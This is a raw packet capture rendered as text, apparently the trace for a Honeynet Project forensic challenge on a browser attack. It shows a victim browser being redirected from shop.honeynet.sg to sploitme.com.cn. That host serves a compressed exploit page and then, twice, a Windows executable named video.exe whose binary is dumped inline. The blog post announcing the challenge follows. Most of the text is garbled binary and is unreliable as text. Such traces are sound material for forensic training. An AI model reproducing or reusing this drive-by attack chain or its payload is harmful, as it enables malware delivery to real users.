2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=93 ETag: "661c5-7b-47e61676d81c0" ;=KGRT5'_E@ 84TPI\P_FGET /fg/show.php?s=84c090bd86 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: sploitme.com.cn Connection: Keep-Alive ;=KGRT5'_E@3 83RPFރ P XGET /catalog/includes/languages/english/images/icon.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "66225-c3-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ;=K K66'_RT5E()@s84 PTI^P ;=K-K66'_RT5E(*@s83 PR F8P;=K'_RT5E +@r83 PR F8PbkHTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=93 ETag: "66225-c3-47e61676d81c0" ;=Ks]RT5'_E@2 83SP+ PxGET /catalog/includes/languages/german/images/icon.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "662f5-71-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ;=K1^66'_RT5E(,@s83 PS P8;=K '_RT5E -@r83 PS PHTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=92 ETag: "662f5-71-47e61676d81c0" ;=KzRT5'_E@/ 
83RPF8 P,?GET /catalog/includes/languages/espanol/images/icon.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "6628e-80-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ;=K66'_RT5E(.@s83 PR FP;=Kʽ'_RT5E /@r83 PR FP[HTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=92 ETag: "6628e-80-47e61676d81c0" ;=KRT5'_E@8 83SP P.GET /catalog/images/banners/oscommerce.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "661d3-22fd-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ;=K66'_RT5E(0@s83 PS P;=K'_RT5E 1@r83 PS PaHTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=91 ETag: "661d3-22fd-47e61676d81c0" ;=KuU<<RT5'_E(@ 83SP PK~;=KW<<RT5'_E(@ 83RPF PK;=K '_RT5E2@m84 PTI^P&HTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13766 Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Content-Type: text/html }ӞGuT?KE/X1!2PVb$GY>}9Y-*&KHOw߾˹~~w~˿޿>|'O7ӗ<ۛ<}ۛ~g/_|gO_<}O=yO^~v^ 
Og_<}޽{᳏!{O>OoO>}/o>ߞx~?)ĔKm}7?|㭏n?'Ϟ}/^=ó/^?|w_?}Z$#㥛[dd'û7~~oO>?O^~zmьc>;?}{/>y{޵:_?l=޿{ſ wn;y;S{ys'|o_v x'zʽ?֗֠V_BJ/? ;}~dݿu.mŗ7.o&D%dKc=m ƽ?s7:7|/7r{q{rJto^w|φz8֗o2M5vR_[Ïx&Ag=yzgjsڊw<|f~ODyj_zŇö/oq^;=K '_RT5E3@m84 PTI^P\Z㺅{&1eWR=$w>F=GO9Yc-1Z!ƾj Bl3lL#.qJ,A%9☱Es6{+XB 9Sd`?~c~X5HwzĹ`P֨O`\O[oLה==) i\{q >f660V1ls_[\]O|#ְ[djSX(k#sX?/li[¶~W$h=ڻ2mꭱփ(?cCUZ6ZK.W{k 1Pyŀ 8e djw{ü[&3i=cAM!^y%{ܖLn;fd>Fk6րaSgȌͺcC"zXckPO0^b'L6jYK^:beVi g6r)t|k W~qlhXyìm'+"l&֤e۵b\-Iva.!m8 [n 1Dh6a326.]ә5q1^05-ayO>,k8$%Jf(%kl!0,)0LFC J*ЊD[1C25 q^DZs.`POFk-/慵 a[وX FL|pKO|֚ʁ'v[mwؔ rÎ@6R0 MG\%HvzCa 첝*=_hz/дvM ˑzfb7W%ma]Qzc&ʄ3>rgOt=m6Xr0h.CFX>@S.ٝbPJU5{Ta"03mA7pQv;n1l+6 W$.L+qyͦTPf>v$pf;=KK<<RT5'_E(@ 84TPI^Pg;=K'_RT5E4@n!84 PTFI^P<1gO~(_ h}7`#m~$-WKvr9G$M7BfL_K,H)}@E`zo`bT*փވxsxl\TP&ġ*cWb-PPYpmڻ(2};l6F;^Exz42)p{,s:1,FB3`ИlW:Y f"pLGd|5Bry5hQhvșW`G7 {#C.Bu4{Z;,-|e rR%B3 gw"4V\M(I\kL BaU zkbWXAo'haW;աx~mc y±yL4!rWX3! ߠM؟zULϘ6l ޗ tvM} ]!?2l L-" d2dvy@4XA\ &[;bC9m!ķ""s0y*Yl03+ʶِs@`|RƤp2.DM慱b5Dy/fHG.ljټ`oS ԑ y/3 Gr@4ZVrvlCG9 (ӽl 4`CA0_e?Pl!D_UD HZFFGjOlW&ױ AERpT"!OPCXBI9,Ua ܀M!ʀ;=KB'_E  uR  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462;=K)'_RT5E5@m84 PTI^P6W)Eհ/{9y؋H}IUS{ش@2!a!}9 (kd>$"JdKgDCNb$ Lǎ{kbB5Folҙ %±T~\[~&D7b:* ڔ6cg<1"@`~!p9F|mĔb[nQc7,q8}9{Y9>G!̡IW@< CY@8AJ8,Q pCJ6,b9ĩP *wCc q┒%F@n$آkar2A.A <@iÄX2ӉJ."EcT~䕱9R[v~ L@]Mr*RLmy0n(PS>0#3̥`%u8vE7,g!XCc(7yvvF$6s*QebSIP7 s*Q/0='%X%*E݋~-l@S)~`+8MeO+kأ{`Fay٨K+W9 _gO{3Yyv-c*QWR.gܟz,&6Q%bcb0D=hŸa,8hyQpV|F 8dk(˳!G*|NqFA <$|7?-ߠ~8mk ׇy|6ddĈ}04+Uý{+IMJId/2S$ @Wfv,!a)vl(K%RVj^7^,Noּ+Ma^Y弲c_8/(1Q _ 㔄d_qy 3/cyF=RojmL P6y^ѱ~دBW/J~`}^ =RyL,d9 8R8cx*}^T>/)G;8)m3oƹ{'g\m8._)ԫt&%5/r|uJ–2rH vƆ68\H+|~59h^<"`.zCr9Wm(1pޢ7|L!o+C T,as|b^;=Ki'_RT5E6@m84 PTI^P1yk9lG}' u9,]LW+ ba(>$ԩ:yJZY_LEModdc/#a)yѧ`z܃Wz._$sm*YpâpW=@Gw]( w(~%V$r^u!W}7vg.Ɲb NJ҇=2BՕlDy^Ud]=6P}+9##Id$,s K{>(ѡ*<)'e+KxTMrZs1[!-Nfj|IXTr8"k=jO k+Y3HM~EWǝ29;5vDsp^LO"KȚ.D#|-rnYXc"u6kDsqhM>s0Q_izLwȨ p<=#;pk߱JF [&7&2?9G5Y 
<@Oo4APSLE3pn@m*HԚK:&tfX:j}^5Hct{:J!BW;Yj;Ba/2*P"3a^[apAuˆ"ra"y9$.FϜ2dʍTT7c,MCl.(9G]M-BvJHB08/=Nz=8ʣ2A|!g4R\f}%U2a}*0cş_dAMl]"v/e2fȒ)C'd'SNTLJ3puE7HJ ïK[ sB$.Ac}\}21CQ{9T۠&e:NLoerC[,Nd u6ÉGļLGRGC_%_Th*RaM)l6Qp86^um1sΫf!Que)C j. SYTk GW[{l<rD"R0Fue:I6 ]"4b*s7e2FTA+8s*Rba.G8m5#H/:X=ǍI%ڥ,|Qߖ pjO[gJ8PPh;=K'_RT5E7@m84 PT>I^P *^y~KJFUᦎ5$y.nI!=̪SQh;]Q:S1J.ȶ":>e^Vy=f|^ʧ pl9$a҇y˞C<qAq^P$]rkv/3ǁ} /_AΎ~1Ŭ~ FPͫBOڱ> '1=ry.~,0>/,͋Ya4/`D΃ȟg>/*[ =yynI>s6/ŏ0w9<ɡJhb.r7MoDnE"ŃkPuRP+ʃ(v:1]"{++0[A üBnzY=t˼6~Qo:ㄒr\vgZm&dyE3Qˡ:Eߵ k;a^m^dG_Bҥ>$#a^ i?CϖC+G` yj%\ȟE~!B{O y"sTYo '/eC8kâyyCaGim^[)Wx4{ϵ"W@Ioz헸AՇra=ЇꏩZ :9~Tq\zb>.sȎ>RrXZr_]n?rm9ʵQF%I"O_J4H=l+xTg+m^ɏJF:_rduO9u{'U6n>uȀ:}̳pnBE=ctM %5kKr{.:;s;b:Al9r+d;WUoۂxw䕃b=tAdb߹ NhPyc`:uΤI8X.cS˵p1XӽSc5}% #[ ދXDI+y䋚>t|žl6a|ʗqx;=K'_RT5E8@m84 PTI^P}>D,F *wSr7.o 7 ~̃#QF5E}pŀR+58ǰh5Pw~ʵ(=ՠTsa,4` Z✪4Jbd_>0;WyUns,`akc%8+k.>ϳld;+5~d"ы@,%?e`Y&{-e6<΋u՛@V; vV/K~a?KlHPNP h}S|%K)Ȏ0򱳳Gq. ըeE9`Ɗh2 X(LqQU* jEY -:{c6@!IeRX"ދNr9ZY%)B{:($AH5vf=^"2=ODN=ZٲVUA 7g/ރEzi)W xyYإކDHeW_Yշ1n{Ln'ں 3=p:dy]@0h+KX(l`K$y҉Tm }Fd~8 m%irʍVC5GƧd,4e<|QDM}8)!; . 
:ͷj΁ۃz 9K?k'aA}bUX9`Df~ye͍ȳRu^AaרƋ(g3޽6 $cf|2i+{MPMz=;;(tmҩO s^V2d/Ӹ~\'"$WjlXܹ~#Ѯ]ow v(CmV z$6#B81_ԅC=gzW>ѽCq @R_bzQo_h}Q:2*C_s}6Sʡz hSC+aT7&g37VHb=oӼWP1>$ϭzA( # o+z\YHVg׷eXJKB |Qvg~߿X>_?<Զ}lm ~#ã΍ŕup-("ҽAMU^ee[ x%JޑjQ޼$,W>mG VYޚ5KH[P .UJ.}Dg^J`@~XQAAogNAJrKL yaa'p^:yȓ;=K]'_RT5E9@m84 PTϦI^P gB.ug.Z3$f+vޗʺ^GXy ֺf^EjƺcF}tP-|ѱ]kRN-\}8ل4a:rS̶H yc6dS֫*VO}O ]c!g;_yKry;wYg:~QK|_Qu9r__yݻϫyzCwA8t8_GG!0+z7|8/q|W٧v҇[oӼ.دH>$P +8/64n/jD"l p_{L5R_+_UOo pF-HG61s(wDЇo/ r(<i` ~φa;=K'_RT5E:@m84 PTZI^Pi'~%jV+7+ya'5r&+-4AYŰWy^XG2zcxE|>.Ӎ!bđ>ιQőf}^PCWjC-GCƝUm^䙧y<؋]}`.9Txߞ>/<:yUb|_ۜ *c'|E!'=aׇIn)vYHo} 2CWtv>;2nqdIj-6}"7*7ƫx޿w_Jـ xb:ҫS2Ӛi Pz6xK#bm{GkFTkCm`%llj6749S._#ObtgJ u􎨙/Ⱦ{Yݽ3&h$۞'.~rDAGt?a4ࣴcNKjws5+,J 49\Q(hڒj LJ *&&_ ,t9?*‰"8py}x}oQ,b\#%..ׅc=a8WdKtG;vuטjvCO/ޜgNq% r5dTh~o9cCn_7?,h0]Iv G{G$4ܽ;߸SR>/p U͟{ _̫;\6[swڤ/ھ*NI^Df;lx i*kxM7~:AK_l+=Ϯ+7;=KXX'_RT5EJ;@o84 PTI^Prx }TlgwZsa6$l=.q/$;~x*~'}(M:W?ϞGi?!4aG>᮱bW*+u#Y|Ls*%,2^}?a)gxs&xU"ڦ!b}^u_z ^'Gz'W]'y^{یӗc!84c*N1k}rY&(YuR䰎Ke3!fa I=:REtk7|ͯ8cY188)n*8me͝HwΟ8:pSjUT n[弬J.Eزʭ~/'ȇ 3nTϪ# {,0 k؋5 Je>1\"l-gNNl)%+!WfX{]#zL85xzɏx6 hQ,̑{^PUPDhzd6s*&ٚcC T[Urn)|Q6;D=q?_X ~ڔ߸wo~~xpO>i}Lp}gq~px͞;=K<<RT5'_E( @ 84TPI^Pc;=K<<RT5'_E( @ 84TPI^ZPc;=K <<RT5'_E( @ 84TPI^0Pc;=Kn<<RT5'_E(@ 84TPI^0PbTW;=K<<RT5'_E(@ 84TPI^0PM;=KrJJRT5'_E<@ 84TPI^0P%GET /fg/load.php?e=1 HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://sploitme.com.cn/fg/show.php?s=84c090bd86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: sploitme.com.cn Connection: Keep-Alive ;=KWs66'_RT5E(<@s84 PT0I_PG;=K'_RT5E=@m84 PT0I_PHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:06:43 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Accept-Ranges: bytes Content-Length: 12288 Content-Disposition: inline; filename=video.exe Keep-Alive: timeout=15, max=98 Connection: Keep-Alive Content-Type: 
application/octet-stream MZ@ !L!This program cannot be run in DOS mode. $PEL@n 84 PTI_PY6]U1ۉu1=wC=r[$1҉T$tzt$л؋u]]=twJ=t؋u]]=t[=u$1t$tjt$=$L$`vl$ 1ɉL$<t0R$ ?$D$ %$ \$ 'US$]$@rEP@U\$ 0@D$T$L$ $P@0P@tX0@a@t 0P@D$a@K0 $va@t0P@\$ a@QP$P;0@L$P@T$P@$Y$D$a@B$a@Uv'U$ta@&U$ta@&U a@]t&U a@]ᐐU$A@P@D$0Í&'U$A@ÐUVShSjBPLjjjjjhSE1҅t_jjhP1@tKjPhVS1҅t*Sj Vh@@ 1҅uP.e[^]U1WVSUэA1\$Rh@@S~jS& e[^_]USÃtKSZu8jhSjPjhj0hE@@SjlS1]USdÍE$uC   Шu"t> 1Ҁ …tLtt8EAEAQ P@AA fAB AJ ]ÍvU1D$ 1D$E D$E$Ív'US]u[]$>D$$[]ÍUU EBEBEBJB P@B fBA BQ ]É'U1D$ 1D$E D$E$Ív'U$D$E$Í'US]tmtgP@J z t'9X t`H@uzJB 9t*BJt?Bu9Z uӋSZ[]Z1[]ÉӋRC $ËSt&'U]G&UEuÉ$EN&'U1ɉE p@t[FtUBt*)‰Ѓ;EtEUGEt&u,FtEtBt@B뗃[^_]Í&U؍ED$F$w HE띸E듍v'UWVSE@E‹U>E p@FtUBt*)‰Ѓ;EtEUGEt&uVҀ;=KS'_RT5EA@m84 PTI_P UN MtE)9saU؍ED$F$$ٍUT$1҉w) HU9M1[^_]ø UWVS|UPEu0@ EM̅hu1U9VMԋI Eq9uMus{t&'}uE|_)؃`U؉UT$W$‰$ML$1҉E9Euu9ur1|[^_]ÍMԋY uЉ4$Eu̓uY 3t$&'EcE̋3uMԋE̋Q  ‰ ;EQM̅E̍$rE{@$XEt@UBhZ t$UEuE E@E@u@E @tE@@U҉UUM1ۡP@MQωMp9ӉUr%t&EtCw;]P@9t݋D$UDD$Mԉ $UȅyUM)Ћ4M9EoFuu UB%uJJ 1ҋyM9u :\Cs 9E9ًuԋV E*U؉؋R UUNEMEq9u]؃E 9um]M܋U|L$G$UE$U؉T$E1E9ErU9EqC]롍&;EQ9 EԋMЋP $|[^_]ËuԉVu9pUMUM111;Ms*'uċtuDCDB;]rߋEuPUĉJMVA;EuE$UȋEUuzUtY^MOLM(ED$DD$Uԉ$Uȅ~D;KDuԋM;LuUMBFMu4$MԋUA;=Kn'_RT5EB@m84 PTI_PR% IQ uDuCDA;]+MԍUA $E$UȋE량uvUW1VS P@sE9vu&s FUC 5P@NjCStm9rfP@u1F2tFU FBF%Fu^؉yU T$W$‰0 [^_]ËF2WFU FBF%FtW)Ѓx둉‰m^P@UP@]HU8STT$U1ۉT$$L u=Jx|Au Jy;$u؋]$@@@@T$D$ $A@@@\$L$&'UWVS P@te[^_]EAAAA@@uEAAAAEAAAAEȡ@@EAAAAEAAAAE̡@@EAAAAEAAAAEС@@EAAAAEԡ@@Eء@@E܉4$_d$$Njd $`P@C+@C@(@CtP@pP@S C&'!ȃ$ AhJy硠@@E@@E@@E@@E@@E@@Eh$yuA1҅u$4$iÉP@CP@CP@e[^_]É9؉u Q=r -) ̋@%\a@%ta@%|a@%la@%a@%pa@%a@%ha@%a@%a@%a@%a@%a@%a@%xa@%a@%La@% a@%4a@%(a@%Pa@%a@%Da@;=K'_RT5EC@m84 PTDI_P(%Ha@%a@%size == sizeof(W32_EH_SHARED)/opt/local/var/macports/build/_opt_local_var_macports_sources_rsync.macports.org_release_ports_cross_i386-mingw32-gcc/work/gcc-3.4.5-20060117-1/gcc/config/i386/w32-shared-ptr.cGetAtomNameA (atom, s, sizeof(s)) != 0| @@AB D4@"A;=K'_RT5ED@n)84 PTI_PIB LP@AB Fl@oAB F!@}AB F'@(AB 
AGh`da`d\a`ldhaa|daaaaaabb(b__p__fmodeP__set_app_typeo_asserty_cexit_iob^_onexit_setmodeabortatexit?freermallocsig;=KK'_RT5EE@o-84 PT pI_P[nalsprintfstrlenstrncmpMessageBoxA````````````````KERNEL32.dll`msvcrt.dll(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`msvcrt.dll<`USER32.dllurlRetriever|http://www.honeynet.org;=KJ<<RT5'_E(@ 84TPI_P6 ;=K<<RT5'_E(@ 84TPI_DP*;=K<<RT5'_E(@ 84TPI_ pP*;=Kb<<RT5'_E(@ 84TPI_P;=K,5JJRT5'_E<@ 84TPI_PMGET /fg/load.php?e=1 HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://sploitme.com.cn/fg/show.php?s=84c090bd86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: sploitme.com.cn Connection: Keep-Alive ;=K566'_RT5E(F@s84 PTI`+P;=KW'_RT5EG@m84 PTI`+PHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:06:43 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Accept-Ranges: bytes Content-Length: 12288 Content-Disposition: inline; filename=video.exe Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Content-Type: application/octet-stream MZ@ !L!This program cannot be run in DOS mode. 
$PEL 1Ҁ …tLtt8EAEAQ P@AA fAB AJ ]ÍvU1D$ 1D$E D$E$Ív'US]u[]$>D$$[]ÍUU EBEBEBJB P@B fBA BQ ]É'U1D$ 1D$E D$E$Ív'U$D$E$Í'US]tmtgP@J z t'9X t`H@uzJB 9t*BJt?Bu9Z uӋSZ[]Z1[]ÉӋRC $ËSt&'U]G&UEuÉ$EN&'U1ɉE p@t[FtUBt*)‰Ѓ;EtEUGEt&u,FtEtBt@B뗃[^_]Í&U؍ED$F$w HE띸E듍v'UWVSE@E‹U>E p@FtUBt*)‰Ѓ;EtEUGEt&uVҁ;=KLc'_RT5EK@m84 PT'I`+PUN MtE)9saU؍ED$F$$ٍUT$1҉w) HU9M1[^_]ø UWVS|UPEu0@ EM̅hu1U9VMԋI Eq9uMus{t&'}uE|_)؃`U؉UT$W$‰$ML$1҉E9Euu9ur1|[^_]ÍMԋY uЉ4$Eu̓uY 3t$&'EcE̋3uMԋE̋Q  ‰ ;EQM̅E̍$rE{@$XEt@UBhZ t$UEuE E@E@u@E @tE@@U҉UUM1ۡP@MQωMp9ӉUr%t&EtCw;]P@9t݋D$UDD$Mԉ $UȅyUM)Ћ4M9EoFuu UB%uJJ 1ҋyM9u :\Cs 9E9ًuԋV E*U؉؋R UUNEMEq9u]؃E 9um]M܋U|L$G$UE$U؉T$E1E9ErU9EqC]롍&;EQ9 EԋMЋP $|[^_]ËuԉVu9pUMUM111;Ms*'uċtuDCDB;]rߋEuPUĉJMVA;EuE$UȋEUuzUtY^MOLM(ED$DD$Uԉ$Uȅ~D;KDuԋM;LuUMBFMu4$MԋUA;=Kuc'_RT5EL@m84 PT-CI`+P^ IQ uDuCDA;]+MԍUA $E$UȋE량uvUW1VS P@sE9vu&s FUC 5P@NjCStm9rfP@u1F2tFU FBF%Fu^؉yU T$W$‰0 [^_]ËF2WFU FBF%FtW)Ѓx둉‰m^P@UP@]HU8STT$U1ۉT$$L u=Jx|Au Jy;$u؋]$@@@@T$D$ $A@@@\$L$&'UWVS P@te[^_]EAAAA@@uEAAAAEAAAAEȡ@@EAAAAEAAAAE̡@@EAAAAEAAAAEС@@EAAAAEԡ@@Eء@@E܉4$_d$$Njd $`P@C+@C@(@CtP@pP@S C&'!ȃ$ AhJy硠@@E@@E@@E@@E@@E@@Eh$yuA1҅u$4$iÉP@CP@CP@e[^_]É9؉u Q=r -) ̋@%\a@%ta@%|a@%la@%a@%pa@%a@%ha@%a@%a@%a@%a@%a@%a@%xa@%a@%La@% a@%4a@%(a@%Pa@%a@%Da@;=Kc'_RT5EM@m84 PT2I`+P3%Ha@%a@%size == sizeof(W32_EH_SHARED)/opt/local/var/macports/build/_opt_local_var_macports_sources_rsync.macports.org_release_ports_cross_i386-mingw32-gcc/work/gcc-3.4.5-20060117-1/gcc/config/i386/w32-shared-ptr.cGetAtomNameA (atom, s, sizeof(s)) != 0| @@AB D4@"A;=Kc'_RT5EN@m84 PT8I`+PtB LP@AB Fl@oAB F!@}AB F'@(AB AGh`da`d\a`ldhaa|daaaaaabb(b__p__fmodeP__set_app_typeo_asserty_cexit_iob^_onexit_setmodeabortatexit?freermallocsignalsprintfstrlenstrncmpMessageBoxA;=Kcmm'_RT5E_O@o_84 PT>_I`+P````````````````KERNEL32.dll`msvcrt.dll(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`msvcrt.dll<`USER32.dllurlRetriever|http://www.honeynet.org;=Kk<<RT5'_E(@ 84TPI`+3P DIEGE;=Kk<<RT5'_E(@ 84TPI`+'PB DIEGE;=Kim<<RT5'_E(@ 84TPI`+2P DIEGE;=Km<<RT5'_E(@ 84TPI`+>_P FHEPF;=K<<RT5'_E(@ 84TPI`+BP) 
FHEPF;=Kp'_E  uS  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462;=KLLRT5'_E>&@ 84TPI`+BPGET /fg/directshow.php HTTP/1.1 Accept: */* Referer: http://sploitme.com.cn/fg/show.php?s=84c090bd86 Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: sploitme.com.cn Connection: Keep-Alive ;=KY66'_RT5E(P@s84 PTBIaAP;=K'_RT5EQ@q84 PTBIaAPHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:06:44 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-Length: 63 Keep-Alive: timeout=15, max=96 Connection: Keep-Alive Content-Type: image/jpeg  4 ;=K`<<RT5'_E((@ 84TPIaAD0Pg DIEGE;=Kl LLRT5'_E>)g 5*n᪩wwwhoneynetorg;=K \\'_RT5ENR@ 5:miwwwhoneynetorg  @r;=Kë >>RT5'_E0*@6 @rWPՁ6p;=K: ::'_RT5E,S@}@r PW|Ձ7`:P;=K <<RT5'_E(,@6 @rWPՁ7|PW FHEPF;=K RT5'_E-@4 @rWPՁ7|P_GET / HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: www.honeynet.org Connection: Keep-Alive Cookie: SESS0f916077214db25d3c25b38417a57722=c3c14637ee4fa2f3ced7dfe9b7f77eb9; __utma=121888786.1305690527.1264085162.1265128952.1265310286.5; __utmz=121888786.1264085162.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=121888786.1.10.1265310286 ;=K 66'_RT5E(T@@r PW|ՃPPA;=K'_E1  uT  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462;=K'_RT5EU@@r PW|ՃPhHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:06:45 GMT Server: Apache X-Powered-By: PHP/4.3.9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 02 Feb 2010 19:06:45 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 6c34 Honeynet Project Blog | 
The Honeynet Project
    To learn the tools, tactics and motives involved in computer and network attacks, and share the lessons learned.

    Honeynet Project Blog

    First challenge of the Forensic Challenge 2010 has been posted.

    Main blog - Mon, 01/18/2010 - 07:21
    We have just posted the first challenge of the Forensic Challenge 2010. The first challenge deals with a network attack. It has been provided by Tillmann Werner from the Giraffe Chapter. It is accessible at https://honeynet.org/node/504. Submissions are due on Monday, February 1st 2010 and results will be released on Monday, February 15th 2010. The top three submissions will be awarded with small prizes. Check it out!

    Challenge 1 of the Forensic Challenge 2010 - pcap attack trace

    Main blog - Mon, 01/18/2010 - 06:18
    Forensic Challenge 2010 Challenge 1 - pcap attack trace - (provided by Tillmann Werner from the Giraffe Chapter) is to investigate a network attack.

    Send submissions (please use the MS Word submission template or the Open Office submission template) to forensicchallenge2010@honeynet.org no later than 17:00 EST, Monday, February 1st 2010. Results will be released on Monday, February 15th 2010. Small prizes will be awarded to the top three submissions.


    Skill Level: Intermediate

    The Challenge:

    A network trace with attack data is provided. (Note that the IP address of the victim has been changed to hide the true location.) Analyze and answer the following questions:

    1. Which systems (i.e. IP addresses) are involved? (2pts)
    2. What can you find out about the attacking host (e.g., where is it located)? (2pts)
    3. How many TCP sessions are contained in the;=K '_RT5EZ@@r PW"ՃP dump file? (2pts)
    4. How long did it take to perform the attack? (2pts)
    5. Which operating system was targeted by the attack? And which service? Which vulnerability? (6pts)
    6. Can you sketch an overview of the general actions performed by the attacker? (6pts)
    7. What specific vulnerability was attacked? (2pts)
    8. What actions does the shellcode perform? Please list the shellcode. (8pts)
    9. Do you think a Honeypot was used to pose as a vulnerable victim? Why? (6pts)
    10. Was there malware involved? What's the name of the malware? (We are not looking for a detailed malware analysis for this challenge) (2pts)
    11. Do you think this is a manual or an automated attack? Why? (2pts)
    Download:
    attack-trace.pcap_.gz Sha1: 0f5ddab19034b2656ec316875b527d9bff1f035f

    Announcing the Honeynet Project Forensic Challenge 2010

    Main blog - Tue, 01/12/2010 - 17:34

    I am very happy to announce the Honeynet Project Forensic Challenge 2010. The purpose of the Forensic Challenges is to take learning one step farther. Instead of having the Honeynet Project analyze attacks and share their findings, Forensic Challenges give the security community the opportunity to analyze attacks and share their findings. In the end, individuals and organizations not only learn about threats, but also learn how to analyze them. Even better, individuals can access the write-ups from other individuals, and learn about new tools and techniques for analyzing attacks. Best of all, the attacks of the Forensic Challenge are attacks encountered in the wild, real hacks, provided by our members.


    It has been several years since we provided Forensic Challenges and with the Forensic Challenge 2010, we will provide desperately needed upgrades. The Forensic Challenge 2010 will include a mixture of server-side attacks on the latest operating systems and services, client-side attacks that emerged in the past few years, attacks on VoIP systems, web applications, etc. At the end of each challenge, we will provide a sample solution created by our members using the state-of-the-art tools that are publicly available, such as libemu and dionaea.


